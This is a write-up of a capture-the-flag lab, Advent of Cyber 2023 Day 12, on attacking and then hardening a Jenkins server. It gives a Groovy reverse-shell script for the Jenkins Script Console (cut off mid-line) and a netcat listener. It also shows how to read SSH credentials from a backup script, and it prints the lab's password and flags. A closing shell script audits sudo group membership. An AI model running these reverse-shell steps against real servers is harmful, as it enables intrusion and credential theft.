Advent Of Cyber 2023 — Day 12
Dec 12, 2023
What is the default port for Jenkins?
8080
What is the password of the user tracy?
- Open the Jenkins panel in a new tab:
http://MACHINE_IP:8080
- Click on “Manage Jenkins”, scroll to the bottom of the page and paste the following script under “Script Console”:
String host="attacking machine IP here";
int port=6996;
String cmd="/bin/bash";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new
- Open a new terminal to set up a reverse shell connection:
nc -nvlp 6996
- Click “Run” on the Jenkins panel
- Now, there should be a connection on your terminal
- View the backup file to get the SSH credentials:
cat /opt/scripts/backup.sh
13_1n_33
What’s the root flag?
- Log in to Tracy’s account using the credentials found in backup.sh
- Switch user to root:
sudo su
- Read the flag from the root directory:
cat /root/flag.txt
ezRo0tW1thoutDiD
What is the error message when you log in as tracy again and try sudo -l after its removal from the sudoers group?
- Remove Tracy from the sudo group:
sudo deluser tracy sudo
- Close the SSH connection and log in again
- Type the following command to see the error:
sudo -l -U tracy
Sorry, user tracy may not run sudo on jenkins
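A follow-up check for the sudo removal step above, as an added example that is not part of the original walkthrough: it lists who still holds a privileged group, including accounts that have the group as their primary GID and therefore never show up in the group's member list. The function names, the allowlist and the sample accounts (ubuntu, backupadm) are assumptions made for illustration.

```shell
#!/bin/sh
# Added example: audit membership of a privileged group from
# group(5)/passwd(5) formatted files (live files or copies of them).

# privileged_members GROUP GROUP_FILE PASSWD_FILE -> one username per line
privileged_members() {
    # group(5) layout: name:password:GID:member1,member2,...
    pm_gid=$(awk -F: -v g="$1" '$1 == g { print $3; exit }' "$2")
    [ -n "$pm_gid" ] || return 1          # no such group
    {
        # Supplementary members named in the group's 4th field.
        awk -F: -v g="$1" '$1 == g {
            n = split($4, m, ",")
            for (i = 1; i <= n; i++) if (m[i] != "") print m[i]
        }' "$2"
        # Accounts whose primary GID is the group are not listed there.
        awk -F: -v gid="$pm_gid" '$4 == gid { print $1 }' "$3"
    } | sort -u
}

# unexpected_members GROUP GROUP_FILE PASSWD_FILE ALLOWED_USER...
# Prints members that are not on the allowlist.
unexpected_members() {
    um_group=$1 um_gf=$2 um_pf=$3
    shift 3
    um_allowed=" $* "
    privileged_members "$um_group" "$um_gf" "$um_pf" | while read -r um_user; do
        case "$um_allowed" in
            *" $um_user "*) ;;
            *) echo "$um_user" ;;
        esac
    done
}

# Constructed sample data (hypothetical accounts, not from the lab machine).
SAMPLE_DIR=$(mktemp -d)
cat > "$SAMPLE_DIR/group" <<'EOF'
root:x:0:
sudo:x:27:ubuntu,tracy
jenkins:x:118:
EOF
cat > "$SAMPLE_DIR/passwd" <<'EOF'
ubuntu:x:1000:1000::/home/ubuntu:/bin/bash
tracy:x:1001:1001::/home/tracy:/bin/bash
backupadm:x:1002:27::/home/backupadm:/bin/bash
jenkins:x:118:118::/var/lib/jenkins:/bin/false
EOF

# Only "ubuntu" is approved here, so backupadm and tracy are reported.
unexpected_members sudo "$SAMPLE_DIR/group" "$SAMPLE_DIR/passwd" ubuntu
```

On a real host, pass /etc/group and /etc/passwd as the two file arguments.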
What’s the SSH flag?
- Using the SSH connection, view the sshd_config file to get the flag:
cat /etc/ssh/sshd_config
Ne3d2SecureTh1sSecureSh31l
What’s the Jenkins flag?
- Navigate to the Jenkins directory:
cd /var/lib/jenkins
- Read the XML backup file:
cat config.xml.bk
FullTrust_has_n0_Place1nS3cur1ty
That’s it | Visit mansoorbarri.com for other hacking & IT related articles.